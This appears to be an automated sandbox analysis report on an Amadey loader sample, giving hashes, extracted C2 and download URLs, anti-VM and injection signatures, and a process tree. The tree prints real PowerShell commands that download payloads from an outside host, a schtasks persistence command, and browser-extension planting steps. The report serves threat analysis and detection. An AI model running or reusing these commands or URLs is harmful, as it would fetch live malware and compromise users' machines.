Analysis
- max time kernel: 143s
- max time network: 133s
- platform: windows11-21h2_x64
- resource: win11-20240419-en
- resource tags: arch:x64, arch:x86, image:win11-20240419-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 19-05-2024 16:25

Static task: static1
Behavioral task: behavioral1
Sample: fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe
Resource: win10v2004-20240226-en
General
- Target: fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe
- Size: 1.8MB
- MD5: a41ed1469e0fc7bb00ffba36cf6fb862
- SHA1: 3479ae464278d392aa4555524ad7a40a5a3c2df2
- SHA256: fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31
- SHA512: 9ad1009e85efef1277fafc774f36fa71be1bad4d4bebc2944a59db076592f040427fd1edcaef653159d8b9d07461ca19b4fdc1e8dbd2964980972a5c503ef21d
- SSDEEP: 49152:6O95X9+LbTNyR9nuU9UdwaxwgNtA6erpkJayQfw6x:DFOTIRzULwgodQgfLx
Malware Config

Extracted
- https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002

Extracted
- https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1002

Extracted
- https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=444&c=1002

Extracted
- Family: amadey
- Version: 4.20
- Botnet: c767c0
- C2: http://5.42.96.7
- install_dir: 7af68cdb52
- install_file: axplons.exe
- strings_key: e2ce58e78f631ed97d01fe7b70e85d5e
- url_paths: /zamo7h/index.php
Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 4 IoCs)
Processes:
- axplons.exe: Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__
- axplons.exe: Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__
- fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe: Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__
- axplons.exe: Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Blocklisted process makes network request (5 IoCs)
Processes:
- flow 24, PID 2148 powershell.exe
- flow 25, PID 4616 powershell.exe
- flow 26, PID 4616 powershell.exe
- flow 28, PID 2192 powershell.exe
- flow 29, PID 2192 powershell.exe
Downloads MZ/PE file
Checks BIOS information in registry (2 TTPs, 8 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Processes:
- axplons.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
- axplons.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
- axplons.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
- fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
- fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
- axplons.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
- axplons.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
- axplons.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
Executes dropped EXE (11 IoCs)
Processes:
- PID 4560 axplons.exe
- PID 4992 Newoff.exe
- PID 1412 toolspub1.exe
- PID 836 lumma1234.exe
- PID 232 vpn-1002.exe
- PID 4872 i0.exe
- PID 764 i0.tmp
- PID 4808 axplons.exe
- PID 3164 Newoff.exe
- PID 2564 Newoff.exe
- PID 2824 axplons.exe
Identifies Wine through registry keys (2 TTPs, 4 IoCs)
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
Processes:
- fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe: Key opened \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Wine
- axplons.exe: Key opened \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Wine
- axplons.exe: Key opened \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Wine
- axplons.exe: Key opened \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Wine
Loads dropped DLL (1 IoC)
Processes:
- PID 232 vpn-1002.exe
Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.
Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
- flow 30: checkip.amazonaws.com
- flow 4: checkip.amazonaws.com
Drops file in System32 directory (1 IoC)
Processes:
- i0.tmp: File created C:\Windows\system32\shlwapi_p.dll
Suspicious use of NtSetInformationThreadHideFromDebugger (4 IoCs)
Processes:
- PID 2012 fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe
- PID 4560 axplons.exe
- PID 4808 axplons.exe
- PID 2824 axplons.exe
Suspicious use of SetThreadContext (1 IoC)
Processes:
- PID 836 lumma1234.exe set thread context of PID 2384 RegAsm.exe
Drops file in Program Files directory (14 IoCs)
Processes:
- i0.tmp: File created C:\Program Files\Google\Chrome\Application\chrome.exe.manifest
- i0.tmp: File created C:\Program Files (x86)\Microsoft\Edge\Application\dlls\dlls.manifest
- i0.tmp: File created C:\Program Files\Online Security\unins000.dat
- i0.tmp: File created C:\Program Files\Google\Chrome\Application\Extensions\security.crx
- i0.tmp: File created C:\Program Files (x86)\Microsoft\Edge\Application\dlls\Shlwapi.dll
- i0.tmp: File created C:\Program Files (x86)\Microsoft\Edge\Application\Extensions\security.crx
- i0.tmp: File opened for modification C:\Program Files\Online Security\unins000.dat
- i0.tmp: File created C:\Program Files\Google\Chrome\Application\dlls\dlls.manifest
- i0.tmp: File created C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.manifest
- i0.tmp: File created C:\Program Files (x86)\Microsoft\Edge\Application\Extensions\updates.xml
- i0.tmp: File opened for modification C:\Program Files\Google\Chrome\Application\dlls\dlls.manifest
- i0.tmp: File created C:\Program Files\Google\Chrome\Application\dlls\Shlwapi.dll
- i0.tmp: File created C:\Program Files\Google\Chrome\Application\Extensions\updates.xml
- i0.tmp: File created C:\Program Files\Online Security\is-UG4QN.tmp
Drops file in Windows directory (3 IoCs)
Processes:
- fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe: File created C:\Windows\Tasks\axplons.job
- chrome.exe: File opened for modification C:\Windows\SystemTemp
- chrome.exe: File created C:\Windows\SystemTemp\scoped_dir2656_128953709\extension.zip
Command and Scripting Interpreter: PowerShell
Processes:
- PID 2148 powershell.exe
- PID 4616 powershell.exe
- PID 2192 powershell.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Program crash (1 IoC)
Processes:
- PID 5040 WerFault.exe, target PID 1412 toolspub1.exe
Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
Processes:
- toolspub1.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI
- toolspub1.exe: Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI
- toolspub1.exe: Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Kills process with taskkill (2 IoCs)
Processes:
- PID 1268 taskkill.exe
- PID 1696 taskkill.exe
Script User-Agent (1 IoC)
Uses user-agent string associated with script host/environment.
Processes:
- flow 31: HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses (14 IoCs)
Processes:
- PID 2012 fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe
- PID 2012 fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe
- PID 4560 axplons.exe
- PID 4560 axplons.exe
- PID 2148 powershell.exe
- PID 2148 powershell.exe
- PID 4616 powershell.exe
- PID 4616 powershell.exe
- PID 2192 powershell.exe
- PID 2192 powershell.exe
- PID 4808 axplons.exe
- PID 4808 axplons.exe
- PID 2824 axplons.exe
- PID 2824 axplons.exe
Suspicious use of AdjustPrivilegeToken (5 IoCs)
Processes:
- PID 2148 powershell.exe: Token: SeDebugPrivilege
- PID 4616 powershell.exe: Token: SeDebugPrivilege
- PID 2192 powershell.exe: Token: SeDebugPrivilege
- PID 1696 taskkill.exe: Token: SeDebugPrivilege
- PID 1268 taskkill.exe: Token: SeDebugPrivilege
Suspicious use of FindShellTrayWindow (1 IoC)
Processes:
- PID 764 i0.tmp
Suspicious use of WriteProcessMemory (59 IoCs)
Processes:
- PID 2012 fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe wrote to memory of PID 4560 axplons.exe (3 times)
- PID 4560 axplons.exe wrote to memory of PID 4992 Newoff.exe (3 times)
- PID 4992 Newoff.exe wrote to memory of PID 4732 schtasks.exe (3 times)
- PID 4992 Newoff.exe wrote to memory of PID 1412 toolspub1.exe (3 times)
- PID 4560 axplons.exe wrote to memory of PID 836 lumma1234.exe (3 times)
- PID 836 lumma1234.exe wrote to memory of PID 2384 RegAsm.exe (9 times)
- PID 4992 Newoff.exe wrote to memory of PID 232 vpn-1002.exe (3 times)
- PID 232 vpn-1002.exe wrote to memory of PID 1924 cmd.exe (3 times)
- PID 1924 cmd.exe wrote to memory of PID 2148 powershell.exe (3 times)
- PID 1924 cmd.exe wrote to memory of PID 4616 powershell.exe (3 times)
- PID 1924 cmd.exe wrote to memory of PID 4872 i0.exe (3 times)
- PID 1924 cmd.exe wrote to memory of PID 2192 powershell.exe (3 times)
- PID 4872 i0.exe wrote to memory of PID 764 i0.tmp (3 times)
- PID 764 i0.tmp wrote to memory of PID 4080 cmd.exe (2 times)
- PID 4080 cmd.exe wrote to memory of PID 2656 chrome.exe (2 times)
- PID 2656 chrome.exe wrote to memory of PID 2168 chrome.exe (2 times)
- PID 764 i0.tmp wrote to memory of PID 1876 cmd.exe (2 times)
- PID 764 i0.tmp wrote to memory of PID 3376 cmd.exe (2 times)
- PID 764 i0.tmp wrote to memory of PID 1696 taskkill.exe (2 times)
- PID 764 i0.tmp wrote to memory of PID 1268 taskkill.exe (2 times)
Processes
(the bracketed number is the nesting depth of each process in the tree)

[1] C:\Users\Admin\AppData\Local\Temp\fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\fd111caa11ffcab2bd343bd5936359ed2e46041717793eca872b24aabbc5ab31.exe"
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
      - Identifies VirtualBox via ACPI registry values (likely anti-VM)
      - Checks BIOS information in registry
      - Executes dropped EXE
      - Identifies Wine through registry keys
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe"
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\schtasks.exe
          Command line: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe" /F
          - Creates scheduled task(s)
      [4] C:\Users\Admin\AppData\Local\Temp\1000270001\toolspub1.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\1000270001\toolspub1.exe"
          - Executes dropped EXE
          - Checks SCSI registry key(s)
        [5] C:\Windows\SysWOW64\WerFault.exe
            Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1412 -s 384
            - Program crash
      [4] C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe"
          - Executes dropped EXE
          - Loads dropped DLL
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\cmd.exe
            Command line: "cmd" /c "C:\Users\Admin\AppData\Local\Temp\nst5035.tmp\abc.bat"
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Command line: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002','stat')"
              - Blocklisted process makes network request
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Command line: powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1002','i0.exe')"
              - Blocklisted process makes network request
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
          [6] C:\Users\Admin\AppData\Local\Temp\i0.exe
              Command line: i0.exe /verysilent /sub=1000
              - Executes dropped EXE
              - Suspicious use of WriteProcessMemory
            [7] C:\Users\Admin\AppData\Local\Temp\is-JLORN.tmp\i0.tmp
                Command line: "C:\Users\Admin\AppData\Local\Temp\is-JLORN.tmp\i0.tmp" /SL5="$901AA,2859366,899584,C:\Users\Admin\AppData\Local\Temp\i0.exe" /verysilent /sub=1000
                - Executes dropped EXE
                - Drops file in System32 directory
                - Drops file in Program Files directory
                - Suspicious use of FindShellTrayWindow
                - Suspicious use of WriteProcessMemory
              [8] C:\Windows\system32\cmd.exe
                  Command line: "C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\njktgx > "C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\~execwithresult.txt""
                  - Suspicious use of WriteProcessMemory
                [9] C:\Program Files\Google\Chrome\Application\chrome.exe
                    Command line: "C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\njktgx
                    - Drops file in Windows directory
                    - Suspicious use of WriteProcessMemory
                  [10] C:\Program Files\Google\Chrome\Application\chrome.exe
                       Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x104,0x108,0x10c,0xdc,0x110,0x7ff86081cc40,0x7ff86081cc4c,0x7ff86081cc58
              [8] C:\Windows\system32\cmd.exe
                  Command line: "C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""openssl.exe" rsa -in .\njktgx.pem -pubout -outform DER > "C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\~execwithresult.txt""
              [8] C:\Windows\system32\cmd.exe
                  Command line: "C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\wetqzt > "C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\~execwithresult.txt""
              [8] C:\Windows\SYSTEM32\taskkill.exe
                  Command line: "taskkill.exe" /f /im "msedge.exe"
                  - Kills process with taskkill
                  - Suspicious use of AdjustPrivilegeToken
              [8] C:\Windows\SYSTEM32\taskkill.exe
                  Command line: "taskkill.exe" /f /im "chrome.exe"
                  - Kills process with taskkill
                  - Suspicious use of AdjustPrivilegeToken
          [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Command line: powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=444&c=1002', 'i2.bat')"
              - Blocklisted process makes network request
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
    [3] C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe"
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

[1] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1412 -ip 1412

[1] C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses

[1] C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
    - Executes dropped EXE

[1] C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
    - Executes dropped EXE

[1] C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log (1KB)
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (16KB)
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (16KB)
- C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe (418KB)
- C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe (518KB)
- C:\Users\Admin\AppData\Local\Temp\1000270001\toolspub1.exe (210KB)
- C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe (49KB)
- C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe (1.8MB)
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2kczhrn1.fsm.ps1 (60B)
- C:\Users\Admin\AppData\Local\Temp\i0.exe (3.5MB)
- C:\Users\Admin\AppData\Local\Temp\is-JLORN.tmp\i0.tmp (3.1MB)
- C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\chrome.zip (47KB)
- C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\dlls.manifest (208B)
- C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\edge.zip (43KB)
- C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\njktgx.crx (49KB)
- C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\njktgx.pem (1KB)
- C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\njktgx\icons\icon-128.png (8KB)
- C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\njktgx\icons\icon-34.png (3KB)
- C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\njktgx\js\background.js (108KB)
- C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\njktgx\manifest.json (438B)
- C:\Users\Admin\AppData\Local\Temp\is-PR3FE.tmp\shlwapi.dll (48KB)
- C:\Users\Admin\AppData\Local\Temp\nst5035.tmp\INetC.dll (25KB)
- C:\Users\Admin\AppData\Local\Temp\nst5035.tmp\abc.bat (735B)